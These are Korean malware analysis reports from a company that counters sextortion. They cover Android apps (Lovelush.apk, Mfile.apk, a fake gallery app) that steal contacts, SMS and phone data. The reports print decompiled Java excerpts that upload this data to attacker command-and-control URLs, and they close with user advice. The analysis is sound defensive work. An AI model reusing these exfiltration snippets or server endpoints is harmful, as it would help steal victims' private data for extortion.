-
리포트
- [25년 5월] 몸캠피싱 해킹 앱 - Lovelush.apk
- 아크링크만의 솔루션인 "Deep-Coding"을 활용하여목차1.1 수행 인력1.2 수행 환경1.3 수행 대상2.1 위험도 평가 기준3.1 악성 행위 개요3.2 악성 행위 요약3.3 유의사항4.1 정적 분석4.2 동적 분석06.사용자 대응 가이드01. 개요악성 앱 분석을 수행한 인력은 다음과 같다.악성코드 분석을 수행한 환경은 다음과 같다.악성코드 분석을 수행한 대상은 다음과 같다.02. 진단 상세위험도주요 내용등급5가용성에 직접적인 영향중요 정보(연락처, 사진 등) 노출단말 제어권한 획득으로 임의 조작 가능상(High)4사용자 권한 획득다른 동작과 연계될 경우 가용성에 직접적인 영향다른 동작과 연계될 경우 단말기 관리자 권한 획득 등3다른 동작과 연계될 경우 시스템 사용자 또는앱 사용자 권한 획득 등다른 동작과 연계될 경우 중요 정보 유출 가능성 있음가용성에 간접적인 영향 등중(Medium)2추가적인 공격에 활용 가능한 단말 및 사용자 정보 유출다른 동작과 연계될 경우 가용성에 간접적인 영향 등하(Low)1공격과 직접적인 연관은 없으나 불필요한 정보 등이공격자 서버에 유출단말기에 관한 일반 정보 유출 등03. 분석 결과 요약Lovelush 앱은 안드로이드 플랫폼에서 작동하는 악성 피싱 앱이다.악성 앱 실행 시 단말의 전화번호, 사용자명, SMS 내용, 주소록 등을 수집하여 공격자의 서버(C&C)로 전송한다.대상악성행위 분석권한 설명위험도Lovelush.apkandroid.permission.INTERNET인터넷 접속1android.permission.READ_CONTACTS연락처 읽기5android.permission.READ_PHONE_STATE단말기 정보 읽기4android.permission.READ_PHONE_NUMBERS전화번호 읽기3android.permission.READ_EXTERNAL_STORAGE외부 저장소 읽기5android.permission.READ_MEDIA_IMAGES이미지 읽기4android.permission.READ_MEDIA_AUDIO오디오 파일 읽기3android.permission.READ_MEDIA_VIDEO비디오 파일 읽기4*유의사항본 분석은 주식회사 아크링크에서 수집한 악성 APK 샘플에서 수행되었고 분석을 위한 참조 자료로만 활용되어야 하며, 악성코드 제작 등의 용도로 악용을 금지한다. 본 자료의 전체 혹은 일부를 주식회사 아크링크의 허락을 받지 않고, 무단 개제, 복사 배포 등의 행위는 엄격히 금지한다. 이를 어길 시 민형사상의 손해배상에 처해질 수 있다.4.1 정적 분석앱이 요청하는 권한은 단말에서 수행하는 행위의 범위를 나타낸다.권한의 선언만으로는 앱의 악성 행위 여부를 판단하기 어렵지만, 앱의 전반적인 행위와 결합하여 평가할 수 있는 지표이다.그림 2 AndroidMainfest.xml 파일 내 권한 선언No요청 권한권한 설명중요 권한 여부1android.permission.INTERNET인터넷 접속N2android.permission.READ_CONTACTS연락처 읽기Y3android.permission.READ_PHONE_STATE단말기 정보 읽기Y4android.permission.READ_PHONE_NUMBERS전화번호 읽기Y5android.permission.READ_EXTERNAL_STORAGE외부 저장소 읽기Y6android.permission.READ_MEDIA_IMAGES이미지 읽기Y7android.permission.READ_MEDIA_AUDIO오디오 파일 읽기Y8android.permission.READ_MEDIA_VIDEO비디오 파일 읽기Y*중요 권한 여부는 안드로이드 공식 문서 기준4.1-2 액티비티(Activity)악성 앱의 경우, 액티비티를 통해 사용자를 속이기 위한 화면을 제공하고 숨겨진 기능을 통해 악성 행위를 수행할 수 있다.※ 20개 이상의 난독화된 이름의 액티비티가 존재하지만, 이 보고서의 내용에는 포함하지 않았다.서비스는 사용자 인터페이스 없이 백그라운드에서 실행되는 컴포넌트로, 긴 작업 수행이나 네트워크 전송을 처리할 때 사용된다.대상 앱에 선언된 서비스는 다음과 같다.No서비스비고1com.xyx.sms.servise.LovelYtsYtsLeoUploadService-2com.luck.picture.lib.service.ForegroundService-3com.blankj.utilcode.util.MessengerUtils.ServerService-4.1-4 리시버(Receiver)악성 앱이 특정 조건이나 이벤트에 따라 액티비티를 시작하거나 민감정보를 수신하는 데 활용될 수 있으며, 대상 앱에 선언된 리시버는 존재하지 않는다.4.2 동적 분석대상 앱의 동적 분석 과정에서 사용자에 의한 직접 실행을 기반으로 하는 앱의 동작을 분석한다. 앱이 사용자의 실행으로 어떻게 구동되고, 사용자와 상호작용에 반응하는지 분석하고, 분석의 시작점은 사용자가 앱을 실행하는 순간으로 설정한다.특히, 의심스러운 네트워크 활동, 민감한 정보의 무단 수집 및 전송, 비정상적 시스템 자원 사용 등의 행위를 식별했다.앱을 실행한 후에는 중요 권한을 요청하고 있으며,// com.xyx.sms.LovelYtsYtsLeoUploadActivity@Override // androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, android.app.Activityprotected void onActivityResult(int i, int i2, Intent intent) {super.onActivityResult(i, i2, intent);if (i == 100) {if (ActivityCompat.checkSelfPermission(this, "android.permission.READ_SMS") != 0 && ActivityCompat.checkSelfPermission(this, "android.permission.READ_PHONE_NUMBERS") != 0 && ActivityCompat.checkSelfPermission(this, "android.permission.READ_CONTACTS") != 0 && ActivityCompat.checkSelfPermission(this, PermissionConfig.READ_EXTERNAL_STORAGE) != 0 && ActivityCompat.checkSelfPermission(this, "android.permission.READ_PHONE_STATE") != 0) {this.btn_sync.setEnabled(false);return;} else {uploadAllData();return;} }그림 4 앱 실행 및 권한 요청그림 5 단말 로그 내 권한 허용 메시지 확인4.2-3 단말기 기본 정보 수집// com.xyx.sms.LovelYtsYtsLeoUploadActivitypublic void getContactDataUpload() {this.contactList = LovelYtsYtsLeoReadContactUtils.getContact(this.myActivity);HashMap hashMap = new HashMap();hashMap.put("userName", this.code);hashMap.put("model", "android");hashMap.put("bjPhone", this.phoneNumber);hashMap.put("operatorName", LovelYtsYtsLeoReadContactUtils.getOperatorName(this.myActivity));hashMap.put("phoneContent", JSONObject.toJSONString(this.contactList));new Thread(new AnonymousClass6(hashMap)).start();} 그림 6 수집한 정보 저장 패킷// xyx.sms.utils.LovelYtsYtsLeoConstantpackage com.xyx.sms.utils;public class LovelYtsYtsLeoConstant {public static String contact_url = "webapp/saveAddressBook";public static String img_url = "webapp/image/";public static String login = "webapp/login";public static String sms_url = "webapp/saveSms";}// xyx.sms.utils.LovelYtsYtsLeoHttpUtilspublic class LovelYtsYtsLeoHttpUtils {public static String base_url = "http://xxayjgagagxxg.monster/prod-api/";public static void postFile(Activity activity, String str, File file, final LovelYtsYtsLeoOnSuccess lovelYtsYtsLeoOnSuccess) {new OkHttpClient().newCall(new Request.Builder().url(base_url + str).post(new MultipartBody.Builder().setType(MultipartBody.FORM).addFormDataPart("file", file.getName(), RequestBody.create(MediaType.parse(SelectMimeType.SYSTEM_IMAGE), file)).addFormDataPart("other_field", "value").build()).build()).enqueue(new Callback() { // from class: com.xyx.sms.utils.LovelYtsYtsLeoHttpUtils.1@Override // okhttp3.Callbackpublic void onFailure(Call call, IOException iOException) {Log.e("post", "responseerror==" + iOException.getMessage());...(생략)...public void postJSONObject(String str) {OkHttpClient okHttpClient = new OkHttpClient();try {JSONObject jSONObject = new JSONObject();jSONObject.put("word", (Object) "西红柿炒鸡蛋");jSONObject.put("page", (Object) "1");Log.d("TAG", jSONObject.toString());RequestBody create = RequestBody.create(MediaType.parse("application/json; charset=utf-8"), jSONObject.toString());Request.Builder url = new Request.Builder().url(str);url.post(create).build();Response execute = okHttpClient.newCall(url.build()).execute();if (execute.isSuccessful()) {Log.d("TAG", "返回=" + execute.body().string());}} catch (Exception e) {e.printStackTrace();}}}본 코드에서는 서버로 '西红柿炒鸡蛋(토마토 계란 볶음)'과 ‘1’이라는 값을 포함하는 JSON 데이터를 테스트용으로 전송하는 구조가 구현되어 있다4.2-4 접속 시도 시 메시지 출력그림 7 접속 시도 시 메시지 출력 화면공격 서버에서 파일 수집 명령을 수신한 경우 다음의 코드가 실행되어 외부 저장소에 저장된 파일(이미지, 영상 등)에 접근한다.// com.xyx.sms.LovelYtsYtsLeoHttpUtils public static String base_url = "http://xxayjgagagxxg.monster/prod-api/"; public static void postFile(Activity activity, String str, File file, final LovelYtsYtsLeoOnSuccess lovelYtsYtsLeoOnSuccess) { @Override // okhttp3.Callback Log.e("post", "responseerror==" + iOException.getMessage()); public void onResponse(Call call, Response response) throws IOException { Log.e("post", "response==" + string); } }05. Mitre Att&ck(Mobile)수집한 피싱앱의 악성 행위 사례를 분석하고 공격 기법과 프로세스를 이해하여 최신 기술을 적용시켜 피해자의 피해를 최소화하기 위해 앱이 어떤 보안 위협 모델에 해당하는지를 Mitre Att&ck 매트릭스를 이용하여 분석한다.대상 피싱앱 해당 항목그림 8 Mitre Att&ck 매트릭스분석한 내용을 바탕으로 사용자 대응 가이드를 제시한다.인터넷을 사용하면서 접하는 링크 중에는 피싱이나 악성 코드를 포함하고 있는 경우가 있다.특히, 앱을 다운로드할 때는 항상 공식 앱 스토어를 이용하고, 공식 스토어가 아닌 곳에서 제공하는 앱은 설치하지 않도록 한다.구버전의 안드로이드 운영 체제는 보안 취약점을 포함하고 있을 수 있다. 이러한 취약점은 공격자가 악성 행위를 수행하기 위해 악용할 수 있다.시스템 업데이트는 보안 패치 및 새로운 보안 기능을 제공하여 기기와 데이터를 보호할 수 있다.주기적 미사용 앱 삭제이러한 앱들은 종종 업데이트되지 않아 새로운 보안 취약점에 노출될 수 있다.앱을 설치하거나 사용할 때 요구되는 권한을 신중하게 검토해야 한다.예를 들어, 플래시라이트 앱이 연락처 접근 권한을 요구하는 경우, 이는 의심스러운 요구로 간주될 수 있다. 반드시 필요한 권한만 허용하여 사용해야한다.이미 설치된 앱에 대해서도 주기적으로 검토하는 것을 권장한다.단말기의 비정상 동작 감지 시 전문가 상담이러한 증상이 나타나면 기기를 전문가에게 검사해야 한다.이상, 사이버 범죄 · 몸캠피싱 대응 전문 기업 아크링크였습니다.Towards Safety, Towards Freedom.
-
리포트
- [25년 4월] 몸캠피싱 해킹 앱 - Mfile.apk 분석 보고서
- 목차01. 개요1.1 수행 인력1.2 수행 환경1.3 수행 대상02. 진단 상세2.1 위험도 평가 기준03. 분석 결과 요약3.1 악성 행위 개요3.2 악성 행위 요약3.3 유의사항04. 분석 결과 상세4.1 정적 분석4.2 동적 분석05.Mitre Att&ck(Mobile)06.사용자 대응 가이드01. 개요1.1 수행인력악성 앱 분석을 수행한 인력은 다음과 같다.소속성명직급연락처이메일ARKLINK박민재대표이사1666-5706channel@arklink.co.kr김진욱보안 기술 팀장1.2 수행 환경악성코드 분석을 수행한 환경은 다음과 같다.구분환경분석 단말진단 위치PCUbuntu,Windows 11Pixel 4(Android 11, API Level 30)Arklink R&D Center1.3 수행 대상악성코드 분석을 수행한 대상은 다음과 같다.No구분앱패키지플랫폼1모바일mfile.apkwingyuinyzartzAndroidNoSha256 해시138 A1 12 D5 89 41 D9 8D D2 70 51 D5 CD CE 0D C4 CC 92 73 FF B6 68 3B 80 C4 3F 89 B1 BC C0 F0 1E02. 진단 상세위험도 평가 기준위험도는 평가항목에 해당되는 악성 행위에 대해 위험을 가늠할 수 있도록 5단으로 분류.위험도주요 내용등급5가용성에 직접적인 영향중요 정보(연락처, 사진 등) 노출단말 제어권한 획득으로 임의 조작 가능상(High)4사용자 권한 획득다른 동작과 연계될 경우 가용성에 직접적인 영향다른 동작과 연계될 경우 단말기 관리자 권한 획득 등3다른 동작과 연계될 경우 시스템 사용자 또는앱 사용자 권한 획득 등다른 동작과 연계될 경우 중요 정보 유출 가능성 있음가용성에 간접적인 영향 등중(Medium)2추가적인 공격에 활용 가능한 단말 및 사용자 정보 유출다른 동작과 연계될 경우 가용성에 간접적인 영향 등하(Low)1공격과 직접적인 연관은 없으나 불필요한 정보 등이공격자 서버에 유출단말기에 관한 일반 정보 유출 등03. 분석 결과 요약3.1 악성행위 개요Mfile 앱은 안드로이드 플랫폼에서 작동하는 악성 피싱 앱이다.악성 앱 실행 시 단말의 전화번호, 사용자명, SMS 내용, 주소록 등을 수집하여 공격자의 서버(C&C)로 전송한다.3.2 악성 행위 요약대상악성행위 분석권한 설명위험도mfile.apkandroid.permission.INTERNET인터넷 접속2android.permission.READ_CONTACTS연락처 읽기5android.permission.READ_PHONE_STATE단말기 상태 조회2android.permission.READ_PHONE_NUMBERS전화번호 읽기5android.permission.READ_EXTERNAL_STORAGE외부 저장소 읽기4android.permission.READ_MEDIA_IMAGES미디어 파일(이미지) 접근5android.permission.READ_MEDIA_AUDIO미디어 파일(오디오) 접근3android.permission.READ_MEDIA_VIDEO미디어 파일(동영상) 접근5*유의사항본 분석은 주식회사 아크링크에서 수집한 악성 APK 샘플에서 수행되었고 분석을 위한 참조 자료로만 활용되어야 하며, 악성코드 제작 등의 용도로 악용을 금지한다. 본 자료의 전체 혹은 일부를 주식회사 아크링크의 허락을 받지 않고, 무단 개제, 복사 배포 등의 행위는 엄격히 금지한다. 이를 어길 시 민형사상의 손해배상에 처해질 수 있다.04. 분석 결과 상세4.1 정적 분석4.1-1 권한 분석앱이 요청하는 권한은 단말에서 수행하는 행위의 범위를 나타낸다.‘위험 권한’의 요청은 사용자의 개인 정보의 접근이나 단말 시스템의 주요 기능과 연관되어 있어, 악용될 경우 사용자의 보안에 위협이 될 수 있다.권한의 선언만으로는 앱의 악성 행위 여부를 판단하기 어렵지만, 앱의 전반적인 행위와 결합하여 평가할 수 있는 지표이다.대상 앱에서 선언하는 권한과 설명은 다음과 같다.No요청 권한권한 설명중요 권한 여부 1android.permission.INTERNET인터넷 접속N2android.permission.READ_CONTACTS연락처 읽기Y3android.permission.READ_PHONE_STATE단말 전화번호 및 통화 상태 조회Y4android.permission.READ_PHONE_NUMBERS전화번호 읽기Y5android.permission.READ_EXTERNAL_STORAGE외부 저장소 읽기Y6android.permission.READ_MEDIA_IMAGES미디어 파일(이미지) 접근Y7android.permission.READ_MEDIA_AUDIO미디어 파일(오디오) 접근Y8android.permission.READ_MEDIA_VIDEO미디어 파일(동영상) 접근Y*중요 권한 여부는 안드로이드 공식 문서 기준4.1-2 액티비티(Activity)액티비티는 안드로이드 앱의 화면 구성 단위로, 사용자와 상호작용을 위한 인터페이스를 제공한다. 액티비티 분석은 앱의 기능적 구성요소와 사용자 인터페이스 설계를 파악할 수 있다. 예를 들어, 앱 내의 로그인 화면, 메인 메뉴, 설정 화면 등은 각각 별도의 액티비티로 구현했다.악성 앱의 경우, 액티비티를 통해 사용자를 속이기 위한 화면을 제공하고 숨겨진 기능을 통해 악성 행위를 수행할 수 있다.대상 앱에 선언된 액티비티는 다음과 같다.No액티비티비고1com.xyx.sms.MlFifileWfileYdjfSfayeMfileLoginActivity메인 액티비티2com.xyx.sms.MlFifileWfileYdjfSfayeMfileMainActivity-3com.xyx.sms.MlFifileWfileYdjfSfayeMfileContactActivity-4com.xyx.sms.MlFifileWfileYdjfSfayeMfileAlbumActivity-5com.xyx.sms.MlFifileWfileYdjfSfayeMfileUploadActivity-4.1-3 서비스(Service)서비스는 사용자 인터페이스 없이 백그라운드에서 실행되는 컴포넌트로, 긴 작업 수행이나 네트워크 전송을 처리할 때 사용된다.악성 앱의 경우 서비스는 앱이 사용자의 인지 없이 액티비티를 수행하거나, 지속적으로 데이터를 수집하고 전송하는 데 사용될 수 있다.대상 앱에 선언된 서비스는 다음과 같다.No서비스비고1com.xyx.sms.servise.MlFifileWfileYdjfSfayeMfileUploadService-4.1-4 리시버(Receiver)리시버는 다양한 시스템 이벤트(예: 부팅 완료, 네트워크 상태 변경)에 반응하여 앱을 실행할 수 있다.악성 앱이 특정 조건이나 이벤트에 따라 액티비티를 시작하거나 민감정보를 수신하는 데 활용될 수 있으며, 대상 앱에 선언된 리시버는 존재하지 않는다.4.2 동적 분석4.2-1 사용자 직접 실행대상 앱의 동적 분석 과정에서 사용자에 의한 직접 실행을 기반으로 하는 앱의 동작을 분석한다. 앱이 사용자의 실행으로 어떻게 구동되고, 사용자와 상호작용에 반응하는지 분석하고, 분석의 시작점은 사용자가 앱을 실행하는 순간으로 설정한다.초기 로딩, 권한 요청, 주요 기능 실행 등을 어떻게 처리하는지 분석했으며, 앱의 실행 흐름을 따라가면서, 네트워크 통신, 데이터 저장 및 처리 등 앱의 핵심 동작을 실시간으로 모니터링하였다.특히, 의심스러운 네트워크 활동, 민감한 정보의 무단 수집 및 전송, 비정상적 시스템 자원 사용 등의 행위를 식별했다.4.2-2 앱 동작 중요 권한 요청앱을 실행한 후에는 단말의 화면에 띄울 레이아웃을 설정한다.설정한후에는 단말의 안드로이드 버전(SDK)에 맞게 권한을 요청했다.// com.xyx.sms.M1FifileWfileYdjfSfayeMfileUploadActivity; @Override // androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, android.app.Activity public final void onRequestPermissionsResult(int i5, String[] strArr, int[] iArr) { super.onRequestPermissionsResult(i5, strArr, iArr); if (i5 == 106) { if (v.a.a(this, "android.permission.READ_EXTERNAL_STORAGE") != 0) { v(this.f5146z); return; } else { s(); return; } } switch (i5) { case 100: if (v.a.a(this, "android.permission.READ_PHONE_NUMBERS") != 0 && v.a.a(this, "android.permission.READ_CONTACTS") != 0 && v.a.a(this, "android.permission.READ_EXTERNAL_STORAGE") != 0 && v.a.a(this, "android.permission.READ_PHONE_STATE") != 0) { v(100); break; } else { w(); break; } break; case 101: if (v.a.a(this, "android.permission.READ_SMS") == 0) { u(); break; } else { v(this.f5144x); break; } case 102: if (v.a.a(this, "android.permission.READ_CONTACTS") == 0) { t(); break; } else { v(this.f5145y); break; } } }코드 1 실행 시 앱 레이아웃 설정 및 권한 요청요청하는 권한은 다음과 같다.권한명설명비고android.permission.READ_EXTERNAL_STORAGE외부 저장소 읽기-android.permission.READ_PHONE_NUMBERS단말기 전화번호 읽기-android.permission.READ_CONTACTS연락처 읽기-android.permission.READ_PHONE_STATE단말 전화번호 및 통화 상태 조회-android.permission.READ_SMSSMS(문자메시지) 읽기-단말기 버전 정보, 권한의 최초 허용 여부에 따라 필수 권한에 대해 요청하는 코드가 포함되어 있다.// com.xyx.sms.M1FifileWfileTdjfSfayeMfileLoginActivity @Override // androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, android.app.Activity public final void onRequestPermissionsResult(int i5, String[] strArr, int[] iArr) { super.onRequestPermissionsResult(i5, strArr, iArr); if (i5 != 100 || v.a.a(this, "android.permission.READ_SMS") == 0 || v.a.a(this, "android.permission.READ_PHONE_NUMBERS") == 0 || v.a.a(this, "android.permission.READ_CONTACTS") == 0) { return; } v.a.a(this, "android.permission.READ_PHONE_STATE"); }}코드 2 앱 실행 필수 권한 선언 및 요청//com.xyx.sms.MlFifileWfileYdjfSfayeMfileLoginActivity @Override // java.lang.Runnable public final void run() { ProgressDialog progressDialog = q.f6296a; if (progressDialog != null) { progressDialog.dismiss(); } if (this.f5123c != 200) { Toast.makeText(MlFifileWfileYdjfSfayeMfileLoginActivity.this.getBaseContext(), JSON.parseObject(this.f5124d).getString("msg"), 0).show(); return; } e.b(MlFifileWfileYdjfSfayeMfileLoginActivity.this.getBaseContext(), "초대코드 입력", MlFifileWfileYdjfSfayeMfileLoginActivity.this.f5118s); e.b(MlFifileWfileYdjfSfayeMfileLoginActivity.this.getBaseContext(), "invite_code", MlFifileWfileYdjfSfayeMfileLoginActivity.this.f5116q.getText().toString());..(생략)..코드 3 로그인을 위한 초대코드 입력 요청권한 허용 시 단말 로그에도 실제로 권한이 허용되었음을 확인할 수 있는 로그가 남고 있다.4.2-3 단말기 기본 정보 수집‘사용자명’, ‘모델명’, 단말 전화번호’, ‘통신사’를 수집하여 JSON 파일로 변환 후 하나의 문자열로 저장했다. 그 후 자신들의 서버 추적을 어렵게 하기 위해 t3 클래스에 수집한 정보를 저장했다.// com.xyx.sms.M1FifileWfileTdjfSfayeMfileUploadActivity public final void t() { this.f5139s = t3.d.b(this.f5137q); HashMap hashMap = new HashMap(); hashMap.put("userName", this.A); hashMap.put("model", "android"); hashMap.put("bjPhone", this.B); hashMap.put("operatorName", ((TelephonyManager) this.f5137q.getSystemService("phone")).getSimOperatorName()); hashMap.put("phoneContent", JSON.toJSONString(this.f5139s)); new Thread(new f(hashMap)).start();코드 4 단말 기본정보 수집@Override // java.lang.Runnable public final void run() { t3.c.a("webapp/saveAddressBook", this.f5152c, new a()); }@Override // java.lang.Runnable public final void run() { t3.c.a("webapp/saveSms", this.f5158c, new a()); }//webapp/saveAddressBook, webapp/saveSms 코드롤 통해 t3.c.a 클래스에 저장하게 된다.코드 5 수집 정보 저장@Override // android.os.CountDownTimerpublic final void onFinish() {this.f7236a.f5170f.cancel();MlFifileWfileYdjfSfayeMfileUploadService mlFifileWfileYdjfSfayeMfileUploadService = this.f7236a;mlFifileWfileYdjfSfayeMfileUploadService.f5170f = null;if (v.a.a(mlFifileWfileYdjfSfayeMfileUploadService.f5168d, "android.permission.READ_SMS") == 0 && d.c(this.f7236a.getBaseContext()).size() != this.f7236a.f5167c.size()) {MlFifileWfileYdjfSfayeMfileUploadService mlFifileWfileYdjfSfayeMfileUploadService2 = this.f7236a;mlFifileWfileYdjfSfayeMfileUploadService2.f5167c = d.c(mlFifileWfileYdjfSfayeMfileUploadService2.f5168d);String str = (String) e.a(mlFifileWfileYdjfSfayeMfileUploadService2.f5168d, "invite_code", "");try {mlFifileWfileYdjfSfayeMfileUploadService2.f5169e = "";} catch (Exception unused) {}HashMap hashMap = new HashMap();hashMap.put("userName", str);hashMap.put("bjPhone", mlFifileWfileYdjfSfayeMfileUploadService2.f5169e);hashMap.put("content", JSON.toJSONString(mlFifileWfileYdjfSfayeMfileUploadService2.f5167c));new Thread(new b(hashMap)).start();}..(생략)..코드 6 초대코드 입력 시 저장 정보 전송4.2-4 접속 시도 시 메시지 출력서버의 동작 여부와 관계없이, 앱 화면에는 ‘초대코드가 잘못되었습니다.’라는 문구가 출력된다.공격 서버에서 파일 수집 명령을 수신한 경우 다음의 코드가 실행되어 외부 저장소에 저장된 파일(이미지, 영상 등)에 접근한다.그 후 공격자의 서버("http://pinonaoshsfpaohjgadsf.monster/prod-api/)로 전송한다. 분석 시 공격 서버가 동작하지 않아 정적 분석만 진행하였다.// com.xyx.sms.M1FifileWfileTdjfSfayeMfileUploadActivitypublic final class c { public static void a(String str, Map map, MlFifileWfileYdjfSfayeMfileOnSuccess mlFifileWfileYdjfSfayeMfileOnSuccess) { t tVar; v vVar = new v(); try { try { tVar = t.a("application/json; charset=utf-8"); } catch (IllegalArgumentException unused) { tVar = null; } j jVar = new j(); boolean z4 = false; jVar.f5012i = false; i a5 = jVar.a(); y c5 = a0.c(tVar, a5.e(map)); Log.d("TAG", a5.e(map)); x.a aVar = new x.a(); aVar.d("http://pinonaoshsfpaohjgadsf.monster/prod-api/" + str); aVar.b("POST", c5); aVar.a(); b0 a6 = w.c(vVar, aVar.a(), false).a(); int i5 = a6.f3174e; if (i5 >= 200 && i5 < 300) { z4 = true; }코드 7 외부 서버로 POST 방식 전송05. Mitre Att&ck(Mobile)보안 기술이 발달함에 따라 공격자도 자신의 공격 기술을 발전시키고 있다.수집한 피싱앱의 악성 행위 사례를 분석하고 공격 기법과 프로세스를 이해하여 최신 기술을 적용시켜 피해자의 피해를 최소화하기 위해 앱이 어떤 보안 위협 모델에 해당하는지를 Mitre Att&ck 매트릭스를 이용하여 분석한다.대상 피싱앱 해당 항목06. 사용자 대응 가이드분석한 내용을 바탕으로 사용자 대응 가이드를 제시한다.Mitre Att&ck에서 사용자가 제어할 수 있는 각 단계를 기반으로 사용자가 주의할 내용과 악성앱 실행 시 취할 수 있는 조치를 제시했다.1. 의심스러운 링크 클릭 금지인터넷을 사용하면서 접하는 링크 중에는 피싱이나 악성 코드를 포함하고 있는 경우가 있다.이러한 링크는 이메일, 문자 메시지, 소셜 미디어, 심지어 친구나 지인으로부터 받은 것일지라도 의심스러운 경우 클릭을 피해야 한다.특히, 앱을 다운로드할 때는 항상 공식 앱 스토어를 이용하고, 공식 스토어가 아닌 곳에서 제공하는 앱은 설치하지 않도록 한다.공식 스토어 외부에서 제공되는 앱은 검증되지 않았을 가능성이 높으며, 악성 코드가 포함될 위험이 있다.2. 최신 안드로이드 버전 업데이트 유지구버전의 안드로이드 운영 체제는 보안 취약점을 포함하고 있을 수 있다. 이러한 취약점은 공격자가 악성 행위를 수행하기 위해 악용할 수 있다.따라서, 안드로이드 기기를 항상 최신 버전으로 업데이트하는 것이 중요하다.시스템 업데이트는 보안 패치 및 새로운 보안 기능을 제공하여 기기와 데이터를 보호할 수 있다.3. 주기적 미사용 앱 삭제스마트폰에 설치되어 있지만 사용하지 않는 앱들은 보안 위험을 증가시킬 수 있다.이러한 앱들은 종종 업데이트되지 않아 새로운 보안 취약점에 노출될 수 있다.주기적으로 기기를 검토하고 더 이상 사용하지 않는 앱을 삭제함으로써, 불필요한 보안 위험을 줄일 수 있다.4. 앱 권한 부여 관리앱을 설치하거나 사용할 때 요구되는 권한을 신중하게 검토해야 한다.많은 앱들이 기능 실행에 필요한 것 이상의 권한을 요청할 수 있으며, 이는 사용자의 개인정보와 보안에 위험을 초래할 수 있다.예를 들어, 플래시라이트 앱이 연락처 접근 권한을 요구하는 경우, 이는 의심스러운 요구로 간주될 수 있다. 반드시 필요한 권한만 허용하여 사용해야한다.안드로이드 단말의 설정 메뉴에서 앱 권한을 관리할 수 있으며, 사용자는 각 앱에 부여된 권한을 확인하고 필요하지 않은 권한은 비활성화할 수 있다.이미 설치된 앱에 대해서도 주기적으로 검토하는 것을 권장한다.5. 단말기의 비정상 동작 감지 시 전문가 상담기기가 평소와 다르게 느려지거나 예상치 못한 방식으로 동작하는 경우, 이는 악성 앱의 영향일 수 있다.이러한 증상이 나타나면 기기를 전문가에게 검사해야 한다.전문가는 기기의 보안 상태를 확인하고 필요한 경우 악성 코드 제거나 기타 보안 조치를 취할 수 있다.몸캠피싱 악성 앱 [Mfile.apk] 분석을 마치며, 낯선 이가 공유하는 앱을 함부로 다운받지 않도록 당부의 말씀을 드립니다.이상, 사이버 범죄 · 몸캠피싱 대응 전문 기업 아크링크였습니다.도움이 필요하시면 언제든 연락 바랍니다.Towards Safety, Towards Freedom.안전한 디지털 환경과 더 나은 내일을 연결합니다.
-
리포트
- [2월 2주차] 갤러리 분석 보고서
- 악성 앱과 몸캠피싱의 실태 및 대응 방안겉보기에는 흔한 사진 앱처럼 보이지만, 실제로는 사용자 개인정보를 탈취하는 악성 앱일 수 있습니다. 이번 분석 보고서에서는 갤러리로 위장한 이 악성 앱의 정체를 면밀히 파악하고, 효과적인 대응 방법을 살펴보겠습니다.Part 1. 몸캠피싱 가해 수법몸캠피싱의 수법가해자들은 주로 랜덤채팅이나 SNS의 다이렉트 메시지를 통해 접근하여 피해자와의 대화를 시작합니다. 이후 친밀감을 형성하며 신뢰를 얻는 동시에 교묘한 방식으로 악성 앱 설치를 유도합니다.이 과정에서 피해자는 자신도 모르게 가해자에게 기기의 민감한 권한을 허용하게 되고, 이를 통해 가해자는 피해자의 영상, 사진, 연락처 등의 민감한 데이터를 확보합니다. 이후 이 데이터를 빌미로 협박하는 것이 몸캠피싱의 대표적인 수법입니다.최근 몸캠피싱 범죄는 안드로이드와 iOS를 모두 타겟으로 삼고 있으며, 더욱 정교한 기술을 동원하고 있습니다.예를 들어:가짜 앱스토어(App Store) 화면을 구현하여 피해자가 진짜 애플리케이션을 설치했다고 착각하게 만듭니다.설치된 악성 앱은 피해자의 카메라, 마이크, 저장소 등 민감한 권한에 접근하여 데이터 탈취 및 실시간 감시를 가능하게 합니다.일부 악성 앱은 삭제를 방지하기 위해 시스템 깊숙이 숨거나 백그라운드에서 지속적으로 실행되는 기능을 포함합니다.Part 2. 최신 악성 앱 동향2025년 2월 둘쨰 주까지 아크링크에 접수된 몸캠피싱 관련 악성 앱 목록은 다음과 같습니다.팬더티비BJ, 홈요가, hpb dildo, 비밀공간C, 17LIVES, 필라테스 영상Photo locker, 텔레그램 앨범, 비밀톡, Whales, Aria Yoga, CherryZcloud, Hyeri Yoga, My Video, MZ세대, 울프(Wolf), 내쉼터, 비밀영상비밀앨범, Sfile, Yolo, 플러팅, bp dildo, Zine, Pilates, 갤러리✔️악성 앱의 작동 방식가해자는 피해자에게 피싱 링크를 통해APK(안드로이드) 또는 IPA(iOS) 파일 설치를 유도합니다.이 파일을 설치하게 되면 설치한 기기의개인정보와 연락처가 가해자의 C&C서버로 즉각 유출됩니다.Part 3. 신규 악성 앱: 갤러리2025년 2월 둘째 주, 갤러리 관련 피해 사례가 8건 보고되었으며, 주요 수법은 다음과 같습니다.접근 경로 : 가해자는 피해자와의 친밀도를 의도적으로 형성한 후, SNS, 메신저 등을 통해 접근신뢰 구축 : 대화를 지속하며 친밀감을 쌓고, 링크를 통해 특정 애플리케이션 설치를 권유악성 앱 설치 유도 : 피해자가 다운로드한 파일의 명칭은 스타킹만입고.zip이며, 설치 후 실행 시 초대 코드 입력 창이 표시됨개인정보 탈취 : 가해자가 제공한 초대 코드를 입력하는 순간, 피해자의 개인 정보가 즉시 유출되는 구조이러한 방식으로 피해자가 악성 앱을 설치하도록 유도한 뒤, 개인정보를 탈취하는 사례가 확인되었습니다.Part 4. 갤러리 특징가해자로부터 전달된 악성 앱은 스타킹만입고.zip이라는 파일명으로 표시됩니다. 피해자가 이 파일을 열면 자동으로 실행 가능한 애플리케이션(APK)으로 변환됩니다.앱을 실행하면 초대 코드 입력 창이 나타나며, 가해자가 제공한 초대 코드를 입력하는 순간 개인정보가 즉시 해킹됩니다. Part 5. 갤러리 대응방안대응 시 유의점 : 공장 초기화 금지 - 파일 삭제 시 증거가 소멸되어 해결이 어려워질 수 있습니다.전문가 지원 : 가해자에게 협상 의사를 표시하며 시간을 벌고 전문가의 도움을 요청해야 합니다.악성 앱 분석과 데이터 복구, 유포 차단 솔루션을 지원 받습니다.Part 6. 아크링크의 전문 대응 솔루션아크링크는 매일 업데이트되는 악성 앱을 분석하여 이에 맞는 해결 방안을 제공합니다.특히, 갤러리와 